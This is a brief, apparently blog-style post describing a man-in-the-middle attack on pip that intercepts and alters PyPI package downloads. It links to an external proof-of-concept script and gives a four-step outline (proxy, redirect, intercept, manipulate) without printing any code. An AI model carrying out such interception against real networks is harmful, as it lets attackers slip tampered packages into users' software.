Practical man-in-the-middle attack on pip

I got an interesting article that warns installing packages using pip
in an untrusted environment

You can  intercept and manipulate packages downloaded by PyPi
using the below python code

https://gist.github.com/4698537

yeah~ poc time~

Proof Of Concept

1. run a proxy to see all HTTP traffic through the proxy
2. redirect traffic over your local machine
3. intercepts all traffic
4. use the python script to manipulate downloads by PyPi